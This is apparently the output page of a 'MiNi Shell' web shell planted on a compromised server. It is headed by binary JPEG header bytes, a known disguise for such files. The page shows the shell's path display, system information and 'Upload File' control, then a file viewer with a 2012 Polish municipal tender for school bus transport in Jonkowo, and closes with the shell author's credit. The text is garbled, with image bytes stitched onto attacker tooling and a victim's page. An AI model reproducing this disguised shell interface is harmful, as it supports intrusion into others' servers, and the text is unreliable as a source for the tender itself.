JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120712/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120712/247580-N-2012.html

<p class="kh_header"><b>Jonkowo: Dowożenie uczniów do szkół na terenie gminy Jonkowo</b><br>
<b>Numer ogłoszenia: 247580 - 2012; data zamieszczenia: 12.07.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Jonkowo , ul. Klonowa 2, 11-042 Jonkowo, woj. warmińsko-mazurskie, tel. 0-89 512 92 32, faks 0-89 512 92 37, 512 92 32.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://bip.warmia.mazury.pl/jonkowo_gmina_wiejska</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dowożenie uczniów do szkół na terenie gminy Jonkowo.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.   Przedmiotem zamówienia jest wykonywanie w roku szkolnym 2012/2013 usług transportowych polegających na dowożeniu dzieci i uczniów do szkół na terenie gminy Jonkowo wraz z zapewnieniem opieki w czasie przewozu. 
2.   W zakres zamówienia wchodzi:
1)  przewożenie uczniów z miejsca zamieszkania do szkół (podstawowych i gimnazjum) w Jonkowie i szkoły (podstawowej) w Nowym Kawkowie. dodatkowo w zależności od potrzeb związanych z organizacją pracy szkół do szkoły podstawowej i oddziałów gimnazjum we Wrzesinie.
2)  odwożenie uczniów ze szkół do miejsca zamieszkania po zajęciach dydaktyczno-wychowawczych;
3)  zapewnienie opieki nad dziećmi w czasie przewozów.
3.   Usługi transportowe Wykonawca będzie realizował głównie na trasach obejmujących następujące miejscowości i ich kolonie: Stare Kawkowo kol., Stare Kawkowo, Nowe Kawkowo, Pupki, Węgajty kol. Godki, Węgajty, Jonkowo kol., Jonkowo, Garzewko, Łomy, Mątki, kol. Mątki, Kajny, w razie potrzeby również kol. Wilimowo. Na trasach obejmujących inne miejscowości w zależności od potrzeb związanych z organizacją pracy szkół, w tym również szkoły podstawowej i oddziałów gimnazjum we Wrzesinie oraz w miarę możliwości w zastępstwie za autobus szkolny w przypadku jego awarii. 
4.   Przewidywany maksymalny dzienny przejazd trasami dowożenia i odwożenia uczniów w dniach zajęć dydaktyczno-wychowawczych -  200,5 km.
5.   Rok szkolny 2012/2013 przewiduje 190 dni zajęć dydaktyczno-wychowawczych, z możliwością ustalenia przez dyrektorów szkół dodatkowych dni wolnych od zajęć dydaktyczno-wychowawczych: do 6 dni dla szkół podstawowych oraz do 8 dni dla gimnazjum.
7.   Przewozy wykonywane będą na podstawie rozkładów jazdy przekazywanych Wykonawcy przez stronę Zamawiającą, opracowanych na początku roku szkolnego w czasie układania przez szkoły stałych planów zajęć edukacyjnych, w porozumieniu z dyrektorami szkół oraz osobami obsługi pojazdów, modyfikowanych w miarę potrzeb w trakcie roku szkolnego. 
8.   Wykonawca zobowiązany będzie również do wykonywania przewozów uczniów/dzieci w zmienionym zakresie w stosunku do podstawowych rozkładów jazdy w zależności od potrzeb (rozpoczęcie/zakończenie roku szkolnego, zajęcia wyrównawcze/dodatkowe, uroczystości szkolne, sprawdziany, egzaminy, szkolne zabawy  itp.) wynikających z organizacji pracy szkół, na podstawie ustalonego odrębnie na dany dzień rozkładu jazdy. 
9.   Wykonawca zobowiązany będzie wykonywać usługi transportowe co najmniej jednym autobusem wyposażonym w nie mniej niż 50 miejsc siedzących dla pasażerów (uczniów oraz opiekuna) lub przy użyciu więcej niż jednego środka transportu o łącznej liczbie miejsc siedzących dla pasażerów nie mniejszej niż 50. W przypadku jednoczesnego przewozu uczniów więcej niż jednym środkiem transportu - w każdym pojeździe winna znajdować się osoba pełniąca opiekę nad uczniami. 
10.   Na trasach nie wymagających użycia autobusu/autobusów z 50-ma miejscami dla pasażerów, w szczególności podczas odwożenia uczniów ze szkół lub przewidzianych powtórnych kursów na trasach dowozu, dopuszcza się możliwość realizowania przez Wykonawcę dysponującego więcej niż jednym środkiem transportu, kursów jednym pojazdem o mniejszej liczbie miejsc pod warunkiem zapewnienia wszystkim wsiadającym uczniom miejsc siedzących.
11.   Drogi na trasach przewozu uczniów są utwardzone o nawierzchni bitumicznej                z  wyjątkiem:  drogi  Mątki - Polejki (3 km) w tym droga autobusu - 2 x 1,5 km do Mątki kol., Mątki - Kajny (1,8 km), Godki-Porbady-Wrzesina (3,9 km) oraz drogi Szałstry - Nowe  Kawkowo  (3,8 km) - o  nawierzchni  szutrowej; 
12.   Usługi przewozowe są zawieszane na okres ferii zimowych, przerw świątecznych zimowych i wiosennych i innych dni świąt, a także dodatkowych dni wolnych od zajęć lekcyjnych ustalonych przez dyrektorów szkół. 
13.   Wykonawca zobowiązany będzie wykonać usługi przewozu uczniów w soboty,           w przypadku każdorazowego przełożenia na taki dzień zajęć lekcyjnych lub zorganizowania przez szkołę innych zajęć opiekuńczo-wychowawczych dla uczniów.
14.   Zamawiający w czasie realizacji przedmiotu zamówienia zastrzega sobie prawo do zmian czasu dowożenia i odwożenia uczniów oraz tras i ilości kursów, a tym samym zmian długości codziennych przejazdów. 
15.   Opiekę nad dziećmi w czasie przewozu zapewnia Wykonawca. Do wykonywania zadań związanych z opieką nad uczniami Wykonawca zobowiązany będzie dysponować osobą pełniącą funkcję opiekuna uczniów. Opieki nie może sprawować kierowca pojazdu.
16.   Wynagrodzenie Wykonawcy:
1)  Wartość umowy będzie stanowiła maksymalna całkowita cena brutto wykonania zamówienia określona przez wybranego Wykonawcę, odpowiadająca maksymalnej wartości nominalnej zobowiązania Zamawiającego, której strony nie będą mogły przekroczyć w trakcie realizacji umowy.
2)  Wynagrodzenie za usługi transportowe będzie płatne co miesiąc według  rzeczywiście wykonanych przez Wykonawcę usług transportowych wynikających z rozkładów jazdy w danym miesiącu oraz poleconych zmian przewozów.
3)  Do obliczenia miesięcznego wynagrodzenia zastosowana zostanie określona w ofercie wybranego Wykonawcy cena jednostkowa netto za jeden kilometr przebiegu trasy (wynikającej z rozkładu jazdy, bez względu na liczbę pojazdów realizujących jednocześnie przewóz na danej trasie) przewozu uczniów. Zaoferowana przez Wykonawcę cena jednostkowa netto nie będzie podlegała zmianie w czasie trwania umowy. 
6)  Zamawiający wymaga od Wykonawcy minimum 14 - dniowego terminu płatności faktur.
7)  Zamawiający nie dopuszcza rozliczenia w walutach obcych.
17. Szczegółowy opis przedmiotu zamówienia zawiera Specyfikacja Istotnych Warunków Zamówienia wraz z Załącznikami..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 60.14.00.00-1, 85.31.21.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 28.06.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeżeli Wykonawca wykaże, że posiada uprawnienia do wykonywania działalności gospodarczej w zakresie transportu drogowego osób zgodnie z ustawą z dnia 6 września 2001 r. o transporcie drogowym (j.t. Dz. U. z 2007 r. Nr 125 poz. 874 z późn. zm.) tj: posiada licencję uprawniającą do podejmowania i wykonywania działalności gospodarczej w zakresie transportu drogowego osób. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia warunek musi spełniać co najmniej jeden z Wykonawców.
Ocena spełniania warunku dokonana zostanie w oparciu o oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu oraz o dokument licencji złożony na potwierdzenie spełniania warunku, o którym mowa w rozdz. IX SIWZ - zgodnie z formułą spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeżeli Wykonawca wykaże, że dysponuje lub będzie dysponował do wykonania zamówienia autobusem posiadającym co najmniej 50 miejsc siedzących dla pasażerów  (bez miejsca kierowcy) lub więcej niż jednym autobusem o łącznej liczbie miejsc siedzących dla pasażerów nie mniejszej niż  50. 
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia opisany warunek winien spełnić jeden z Wykonawców w całości lub Wykonawcy łącznie.
Ocena spełniania warunku dokonana zostanie w oparciu o oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu oraz o informacje zawarte w Wykazie środków transportu złożonym na potwierdzenie spełniania warunku, o którym mowa w rozdz. IX SIWZ - zgodnie z formułą spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeżeli Wykonawca wykaże, że dysponuje lub będzie dysponował do wykonania zamówienia:
a)	osobą  uprawnioną do kierowania autobusem, posiadającą ponadto co najmniej 3 - letnie doświadczenie zawodowe w pracy na stanowisku kierowcy autobusu, a w przypadku samodzielnego wykonywania przewozów - osobiście posiadać odpowiednie uprawnienia i doświadczenie zawodowe. 
b)	osobą pełnoletnią z wykształceniem co najmniej zawodowym, która będzie pełniła obowiązki opiekuna uczniów.
W przypadku realizacji zamówienia przy jednoczesnym użyciu więcej niż jednego autobusu z łączną liczbą miejsc siedzących dla pasażerów - co najmniej 50, Wykonawca winien wykazać, iż dysponuje lub będzie dysponował odpowiednio większą liczbą osób - kierowców i opiekunów. 
	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia opisany warunek winien spełnić jeden z Wykonawców w całości lub Wykonawcy łącznie.
Ocena spełniania warunku dokonana zostanie w oparciu o oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu oraz informacje zawarte w wykazie osób, które będą uczestniczyć w wykonywaniu zamówienia - zgodnie z formułą spełnia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.   Pełnomocnictwo do podpisania oferty, w przypadku podpisania oferty przez inną osobę niż uprawnione zgodnie z formą reprezentacji określoną w dokumencie właściwym dla formy organizacyjnej Wykonawcy.
2.   Wykonawcy wspólnie ubiegający się o udzielenie zamówienia zobowiązani są złożyć z ofertą dokument, w którym ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - wiek pojazdu - 10</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.   Dopuszcza się możliwość istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy, mających na celu prawidłową realizację przedmiotu umowy, w zakresie:
1)  maksymalnej całkowitej ceny brutto oraz stawki procentowej i wartości podatku VAT określonych w umowie - w przypadku zmiany obowiązujących w dniu podpisania umowy regulacji prawnych dotyczących stawki podatku VAT - o różnice w kwotach wynikające z zastosowania nowej stawki podatku i terminu jej obowiązywania - na wniosek jednej ze stron.
2)  zmiany osoby)osób wskazanych w złożonym przez Wykonawcę Wykazie osób, które będą uczestniczyć w wykonywaniu zamówienia - może nastąpić w uzasadnio-nych przypadkach, na wniosek Wykonawcy, za uprzednią zgodą Zamawiającego akceptującą kandydata)tów na to stanowisko - kandydat musi co najmniej spełniać wymagania określone w rozdz. VIII ust. 2 pkt. 3 SIWZ. 
3)   zmiany autobusu)ów, który)e Wykonawca wskazał w ofercie do wykonywania zamówienia - zmiana pojazdu może nastąpić w uzasadnionych przypadkach, na wniosek Wykonawcy, za uprzednią zgodą Zamawiającego akceptującą zmianę pojazdu, przy czym inny niż wymieniony w ofercie autobus (autobusy łącznie) musi spełniać wymagania określone w rozdz. VIII ust. 2 pkt. 2 niniejszej Specyfikacji i nie może być starszy niż wskazany w ofercie Wykonawcy).
2.   Forma zmian umowy: pod rygorem nieważności wyłącznie w formie pisemnej,              w postaci kolejno numerowanych aneksów do umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.warmia.mazury.pl       zakładki: wybierz gminę: Jonkowo: zamówienia publiczne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd  Gminy Jonkowo, ul.  Klonowa 2, 11-042 Jonkowo  (pok. 9 parter).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.07.2012 godzina 11:00, miejsce: Sekretariat Urzędu Gminy Jonkowo ul. Klonowa 2, 11-042 Jonkowo, (pok. 16 piętro).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1.   Postępowanie prowadzone jest w języku polskim.
2.   W przedmiotowym postępowaniu oświadczenia, wnioski, zawiadomienia oraz informacje Zamawiający i Wykonawcy przekazują faksem lub pisemnie. 
3.   W przypadku gdy Zamawiający i Wykonawcy będą przekazywać oświadczenia, wnioski, zawiadomienia oraz informacje za pomocą faksu, każda ze stron na żądanie drugiej zobowiązana jest niezwłocznie potwierdzić fakt ich otrzymania. 
4.   Strony mogą dodatkowo (dla pewności przekazania informacji) przekazywać treść oświadczeń, wniosków, zawiadomień oraz informacji również elektronicznie (na podany odpowiednio w siwz lub formularzu oferty adres e-mail), szczególnie w przypadku braku potwierdzenia otrzymania wiadomości faksem.
5.   Korespondencję do Zamawiającego związaną z przedmiotowym postępowaniem należy kierować do Wójta Gminy Jonkowo  na: 
-   faks: (089) 512-92-32 lub
-   pisemnie na adres: Wójt Gminy Jonkowo  ul. Klonowa 2, 11-042 Jonkowo. 
-   dodatkowo e-mail: sekretariat@jonkowo.pl
6.   Za datę wpływu korespondencji przekazanej za pośrednictwem faksu po godzinach pracy Urzędu Gminy Jonkowo (wskazanych w rozdz. I ust. 2 SIWZ)  przyjmuje się datę  kolejnego  dnia  pracy  Urzędu..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com